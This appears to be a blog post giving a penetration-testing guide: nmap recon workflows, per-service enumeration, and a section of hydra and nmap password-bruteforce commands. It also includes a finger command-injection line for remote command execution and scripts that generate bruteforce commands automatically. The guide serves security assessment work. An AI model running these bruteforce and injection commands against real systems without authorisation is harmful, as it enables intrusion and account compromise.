Network Vulnerability Assessment Guidelines


Vulnerability Assessment Guidelines

This document outlines ways to check whether the services you find can be exploited. It does not cover everything and should be treated as a reference. Of the various phases of hacking, I will focus on reconnaissance throughout the document.

Note: perform all pentest-related work from a dedicated machine or a virtual machine.

Reconnaissance (Information gathering)

Information gathering is the very first step before attacking any system. In this phase you gather information about the target network. Information can be anything: technologies in use, where the servers are hosted, web applications and so on. I will focus on network penetration testing.

General workflow

  1. Find all alive hosts in the network
  2. Perform a port scan
  3. Perform basic version enumeration and default script scanning with nmap
  4. Check for outdated versions and public exploits
  5. Check for port- and service-specific things. For example, if you find FTP there are several FTP-specific checks, such as anonymous login
  6. If the service requires authentication, try to guess the passwords or choose a good wordlist, and use a tool like hydra to run the bruteforce attack
  7. Some services become vulnerabilities simply by being exposed. For example, memcached (port 11211) has no authentication and has no business being reachable from the Internet; if it is, anyone can connect to it. MySQL (port 3306) is another example: it requires authentication, but it still should not be exposed to the Internet. Look out for such services

Find all alive hosts in the network (in this example the discovery output is saved to alive-hosts-unfiltered.txt):

sudo nmap -sn ip/range -oN alive-hosts-unfiltered.txt

Before port scanning, extract only the IPs of the hosts that are up into a separate file, alive-hosts.txt. The following command does that. Note that when nmap resolves a hostname the report line reads "Nmap scan report for name (ip)" and field 5 is the name rather than the IP; add -n to the discovery scan if you want the output to stay parseable.

cat alive-hosts-unfiltered.txt | grep -i up -B 1 | grep -i report | awk '{print $5}' > alive-hosts.txt

The next step is port scanning. This command takes its input from alive-hosts.txt, scans all 65535 TCP ports on each host (the hosts are already known to be up, hence -Pn) and saves the output in port-scans.txt:

sudo nmap -p- -iL alive-hosts.txt --disable-arp-ping -n -Pn -oN port-scans.txt

Now identify the services behind the open ports and run nmap's default scripts against them. The command below does version detection (-sV) and the default script set (-sC), which also flags some basic misconfigurations:

sudo nmap -sC -sV -p port ip -oN output
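The three steps above wired together, as an added example that is not part of the original post. Rather than running -sC -sV against all 65535 ports, it parses the full port scan and runs the script/version scan only on the ports that are actually open on each host. It assumes nmap is installed; the two nmap outputs embedded below are constructed samples so the parsing part runs offline, and the file names service-scan-<ip>.txt are an assumption.

```shell
#!/bin/sh
# Added example (not from the original post): host discovery -> full port
# scan -> targeted -sC -sV, driven by parsing nmap's normal (-oN) output.
# nmap is assumed to be installed; both samples below are constructed.

# Constructed output of: sudo nmap -sn -v ip/range -oN alive-hosts-unfiltered.txt
SAMPLE_PING='# Nmap 7.94 scan initiated (constructed sample)
Nmap scan report for 10.0.0.1
Host is up (0.0010s latency).
Nmap scan report for 10.0.0.2
Host is down.
Nmap scan report for gw.lab (10.0.0.5)
Host is up (0.0020s latency).
# Nmap done: 256 IP addresses (2 hosts up) scanned in 3.10 seconds'

# Constructed output of: sudo nmap -p- -iL alive-hosts.txt -n -Pn -oN port-scans.txt
SAMPLE_PORTS='Nmap scan report for 10.0.0.1
Host is up (0.0010s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE    SERVICE
22/tcp  open     ssh
80/tcp  open     http
445/tcp filtered microsoft-ds
Nmap scan report for gw.lab (10.0.0.5)
Host is up (0.0020s latency).
All 65535 scanned ports on gw.lab (10.0.0.5) are in ignored states.'

# Reads -sn output on stdin, prints one IP per line for hosts that are up.
# Uses the last field of the report line and strips parentheses, so
# "Nmap scan report for gw.lab (10.0.0.5)" yields the IP, not the hostname.
alive_hosts() {
  awk '/^Nmap scan report for/ { ip = $NF; gsub(/[()]/, "", ip) }
       /^Host is up/           { print ip }'
}

# Reads a -oN port scan on stdin, prints "ip port,port,..." per host.
# Only ports in state "open" count (filtered ports are skipped) and hosts
# with nothing open are dropped.
open_ports() {
  awk '/^Nmap scan report for/ {
         if (ip != "" && ports != "") print ip, ports
         ip = $NF; gsub(/[()]/, "", ip); ports = ""
       }
       /^[0-9]+\/tcp +open/ {
         p = $1; sub(/\/tcp/, "", p)
         ports = (ports == "" ? p : ports "," p)
       }
       END { if (ip != "" && ports != "") print ip, ports }'
}

# Turns "ip port,port" lines into the targeted -sC -sV scan for each host.
service_scan_cmds() {
  while read -r ip ports; do
    printf 'sudo nmap -sC -sV -p %s %s -oN service-scan-%s.txt\n' "$ports" "$ip" "$ip"
  done
}

# Offline demo on the constructed samples. Against a live network, replace
# the two printf lines with the real nmap runs and pipe the last stage into sh.
printf '%s\n' "$SAMPLE_PING" | alive_hosts
printf '%s\n' "$SAMPLE_PORTS" | open_ports | service_scan_cmds
```

The awk in open_ports is what saves the time: in the sample, 10.0.0.1 gets a script scan of just ports 22 and 80, and 10.0.0.5 (nothing open) is skipped entirely.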

Alternatively, you can run the following as a single command to reduce the number of steps:

  1. The command below scans all ports of the subnet and saves the output in a file named all-tcp-scans.xml. It takes a while to complete. In one run it does the port scan, version enumeration and the default scripts that check for basic misconfigurations.
sudo nmap -sC -sV -p- ip/range -oX all-tcp-scans.xml
  2. The raw output is tedious to read. Convert it to HTML with the command below and view it in a browser (xsltproc uses the nmap.xsl stylesheet referenced inside the XML file, so run it on a machine that has nmap installed):

xsltproc all-tcp-scans.xml > all-subnetworks-scan.html

Now open all-subnetworks-scan.html in a browser. You will see the various services, versions and other information per host. From there we can do the following:

  1. Check for public exploits for the versions found. Usually, only run exploits that have been verified, and read them before running them.

Note: we have used nmap for TCP scans only. Some services are only discovered by a UDP scan. A TCP scan usually finds what matters, but since UDP scanning (nmap -sU) is slow it is a good idea to keep one running in the background.

Services based recon

FTP

Anonymous login

You can try logging in anonymously, list the files and download them all.

ftp ip
> anonymous
> anonymous
> ls -l

You can alternatively try connecting to the ftp server with


Download all files from FTP

wget -m ftp://anonymous:anonymous@ip

SMTP

Basic enumeration

nmap -p 25 --script smtp-commands ip

SMTP user enumeration using nmap

nmap --script smtp-enum-users ip

Send an email

sendEmail -t <to> -f <from> -s ip -u Message -a /path/to/file.txt

SSH

Bruteforce passwords

Common SSH passwords: SecLists

Enumerate valid usernames with Metasploit:

msf > use auxiliary/scanner/ssh/ssh_enumusers

SMB

Scan the network

nbtscan -t ip/range

Shared list

smbclient --no-pass -L //ip

Connect to the folder

smbclient --no-pass //ip/folder

Mount a shared folder

mount -t cifs //ip/share /mount/here

Check for MS17-010 (EternalBlue)

sudo nmap --script smb-vuln-ms17-010 -p 445 ip/range

VNC

Connect to VNC (display :1 is port 5901; p.txt is a VNC password file as written by vncpasswd, not a plaintext password)

vncviewer -passwd p.txt ip::5901

DNS

Zone Transfer

dig axfr domain @dns-server-ip

DNS Enumeration

use auxiliary/gather/enum_dns

DNS Recon

dnsrecon -r ip/24 -n dnsip

Finger

User Enumeration

finger @ip

Automated Tool -U user.txt -t ip

Remote Command Execution (old, vulnerable finger daemons)

finger "|/bin/ls -a /@ip"

NFS

Run the following command to list mountable folders

showmount -e ip

Mount a folder

mkdir /tmp/mounthere
mount -t nfs [-o vers=2] ip:/folder /tmp/mounthere -o nolock

NTP

NTP monlist (amplification check)

If the server answers monlist it leaks its list of recent clients and can be abused as a DDoS amplifier. Test with:

ntpdc -n -c monlist ip

MySQL

Connect To MySQL

mysql -h ip -u username -p

MySQL Enumeration (mysql-info and mysql-empty-password work unauthenticated; several of the others, such as mysql-databases, mysql-users, mysql-dump-hashes and mysql-query, only return results when given valid credentials via script arguments)

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 ip

RDP

Connect To RDP

rdesktop -u username ip

Nmap Enumeration

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 ip

Bruteforce

Almost all services that require authentication can be bruteforced. I will list out ways to bruteforce various services.

Cassandra

nmap --script cassandra-brute -p 9160 <IP>

Elasticsearch (HTTP basic auth on port 9200)

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

FTP

hydra -l root -P passwords.txt ip ftp

JWT (offline, against a captured token)

hashcat -m 16500 -a 0 jwt.txt wordlist.txt

LDAP

nmap --script ldap-brute -p 389 ip

MySQL

hydra -L usernames.txt -P pass.txt ip mysql

RDP

hydra -V -f -L <userslist> -P <passwlist> rdp://ip

SMB

nmap --script smb-brute -p 445 ip

SSH

hydra -l root -P passwords.txt ip ssh
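The bruteforce one-liners above all take the same shape, so the step can be driven directly from the -sV output of the port scan. The following is an added example and not part of the original post: it maps the service names nmap prints to hydra modules and emits one hydra command per authenticated service, carrying the real port with -s so that, for instance, SSH on 2222 is not missed. The wordlist file names and the nmap output embedded below are constructed assumptions. Mind account lockout policies before running the result against SMB or RDP.

```shell
#!/bin/sh
# Added example (not from the original post): turn nmap -sV output into
# hydra commands. Wordlist paths and the sample scan are constructed.

USERS=users.txt
PASSES=passwords.txt

# Constructed -sV output for one host (hypothetical addresses/versions).
SAMPLE_SV='Nmap scan report for 10.0.0.7
Host is up (0.0010s latency).
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           vsftpd 3.0.3
22/tcp    open  ssh           OpenSSH 8.4p1
80/tcp    open  http          nginx 1.18.0
445/tcp   open  microsoft-ds  Samba smbd 4.6.2
2222/tcp  open  ssh?
3306/tcp  open  mysql         MySQL 5.7.30
3389/tcp  open  ms-wbt-server Microsoft Terminal Services'

# nmap service name -> hydra module. Returns 1 for services hydra cannot
# attack from a bare service name (http needs a form/auth specification,
# so it is deliberately left out rather than guessed).
hydra_module() {
  case "$1" in
    ftp)                     echo ftp ;;
    ssh)                     echo ssh ;;
    mysql)                   echo mysql ;;
    microsoft-ds|netbios-ssn) echo smb ;;
    ms-wbt-server)           echo rdp ;;
    vnc)                     echo vnc ;;
    postgresql)              echo postgres ;;
    *)                       return 1 ;;
  esac
}

# Reads nmap -sV normal output on stdin and prints one hydra command per
# bruteforceable open port. A trailing "?" (nmap's "unsure" marker, as on
# 2222 above) is stripped from the service name. -f stops hydra after the
# first valid pair; -s passes the real port so non-default ports work.
hydra_cmds() {
  awk '/^Nmap scan report for/ { ip = $NF; gsub(/[()]/, "", ip) }
       /^[0-9]+\/tcp +open/ {
         p = $1; sub(/\/tcp/, "", p)
         svc = $3; sub(/\?$/, "", svc)
         print ip, p, svc
       }' |
  while read -r ip port svc; do
    mod=$(hydra_module "$svc") || continue
    printf 'hydra -f -L %s -P %s -s %s %s %s\n' "$USERS" "$PASSES" "$port" "$ip" "$mod"
  done
}

# Offline demo: print the commands. On a live target, pipe this into sh
# (or review it first), e.g.: printf '%s\n' "$SAMPLE_SV" | hydra_cmds | sh
printf '%s\n' "$SAMPLE_SV" | hydra_cmds
```

On the constructed sample this yields six commands (ftp, ssh on 22 and 2222, smb, mysql, rdp) and silently skips http, which is the behaviour you want: a web login needs its form parameters spelled out by hand.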

Tools used (Web)

Vulnerability scanner               Domain
Burp Suite                          Web App/API
Acunetix Vulnerability Scanner      Web App/API
Web technologies identification     (tool not listed)
Subdomain enumeration tools         (tool not listed)
Web content scanner                 (tool not listed)

I would recommend installing "nessus community edition", which can scan around 16 IPs for free.

Coded Brain

Hi, I am an information security enthusiast from Nepal.
